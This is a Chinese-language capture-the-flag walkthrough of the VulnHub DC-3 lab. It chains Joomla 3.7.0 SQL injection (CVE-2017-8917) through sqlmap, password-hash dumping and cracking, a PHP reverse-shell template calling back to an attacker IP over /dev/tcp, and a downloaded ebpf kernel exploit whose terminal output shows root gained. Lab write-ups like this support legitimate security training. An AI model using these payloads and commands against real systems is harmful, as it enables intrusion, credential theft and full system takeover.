下载地址:https://www.vulnhub.com/entry/dc-3,312/
主机发现
扫描端口,发现只开启了80端口,通过-A参数,还可以看到该网站的CMS为Joomla
访问80端口
目录扫描,发现网站后台
使用nikto工具:nikto -host 192.168.44.144
使用dirsearch工具
python3 dirsearch.py -u http://192.168.44.144 -e php
使用joom专用漏洞扫描器joomscan,发现joomla的具体版本号
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl 192.168.44.144
使用searchsploit搜索joomla 3.7.0存在的漏洞
searchsploit joomla 3.7.0
读取
根据给出的路径,读取该文件,发现该版本cms内存在sql注入漏洞CVE-2017-8917
打开sqlmap开始注入
暴库
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
暴表
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables
暴字段
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns
暴内容
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump
用户名:admin
密码:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
使用kali的John进行密码破解,得到后台登录密码snoopy
进入之前找到的网站后台进行登陆http://192.168.44.144/administrator/
在后台翻啊翻,发现了某处可以修改网站模版的地方,可以直接新建一个PHP文件,直接反弹shell。
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.44.142/8080 0>&1'");?>
在kali上进行监听,nc -lvvp 8080端口
在浏览器上访问该反弹马,这一块路径卡了一会儿,
结合之前目录扫描出来的templates目录,和模板的名称bees3,再加上linux系统是大小敏感的,
因此花费了一些时间,才找到正确的路径,进行访问
这是kali已经接收到了shell,
权限很低,首先尝试suid提权,以下命令可以发现系统上运行的suid可执行文件
-
find / -perm -u=s -type f 2>/dev/null
-
find / -user root -perm -4000 -print 2>/dev/null
-
find / -user root -perm -4000-exec ls -ldb {}
已知的可用来提权的linux可行性的文件:nmap,vim,find,bash,more,less,nano,cp
没有发现可以利用的文件
尝试内核提权
查看linux版本
利用searchsploit搜索可以利用的漏洞
根据路径,访问exp详细内容:cat /usr/share/exploitdb/exploits/linux/local/39772.txt
发现exp下载地址:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
查找具有执行权限的目录
切换到tmp文件夹下,并且下载searchsploit中的exp
切换:cd tmp
下载:wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
解压:unzip 39773.zip
再解压:tar -xvf exploit.tar
切换:cd ebpf_mapfd_doubleput_exploit/
执行: ./compile.sh
./doubleput
然后得到了root权限
www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<ploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2020-04-09 23:27:16-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2020-04-09 23:27:17-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'
0K ...... 100% 4.44M=0.002s
2020-04-09 23:27:18 (4.44 MB/s) - '39772.zip' saved [7025/7025]
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772.zip
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ unzip 39772.zip
unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772
39772.zip
__MACOSX
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ cd 3977
cd 39772
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
ebpf_mapfd_doubleput_exploit
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doub
./doub
bash: ./doub: No such file or directory
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
bash -i
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# exit
bash: [2708: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$